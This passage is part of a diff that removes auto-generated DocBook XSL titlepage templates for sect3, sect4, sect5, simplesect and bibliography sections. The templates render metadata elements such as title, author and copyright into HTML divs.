-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sect4info/title">
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sect4info/subtitle">
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/corpauthor"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/authorgroup"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/author"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/othercredit"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/releaseinfo"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/copyright"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/legalnotice"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/pubdate"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/revision"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/revhistory"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/abstract"/>
- <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect4.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect4.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="sect4.titlepage.before.recto"/>
- <xsl:call-template name="sect4.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="sect4.titlepage.before.verso"/>
- <xsl:call-template name="sect4.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="sect4.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect4.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect4.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect4.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect4.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sect5info/title">
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sect5info/subtitle">
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/corpauthor"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/authorgroup"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/author"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/othercredit"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/releaseinfo"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/copyright"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/legalnotice"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/pubdate"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/revision"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/revhistory"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/abstract"/>
- <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect5.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect5.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="sect5.titlepage.before.recto"/>
- <xsl:call-template name="sect5.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="sect5.titlepage.before.verso"/>
- <xsl:call-template name="sect5.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="sect5.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect5.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect5.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect5.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect5.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.recto">
- <xsl:choose>
- <xsl:when test="simplesectinfo/title">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="simplesectinfo/subtitle">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/corpauthor"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/authorgroup"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/author"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/othercredit"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/releaseinfo"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/copyright"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/legalnotice"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/pubdate"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/revision"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/revhistory"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/abstract"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="simplesect.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="simplesect.titlepage.before.recto"/>
- <xsl:call-template name="simplesect.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="simplesect.titlepage.before.verso"/>
- <xsl:call-template name="simplesect.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="simplesect.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="simplesect.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="simplesect.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="simplesect.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="simplesect.titlepage.recto.style">
-<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="bibliography.titlepage.recto">
- <div xsl:use-attribute-sets="bibliography.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::bibliography[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="bibliographyinfo/subtitle">
- <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="bibliographyinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
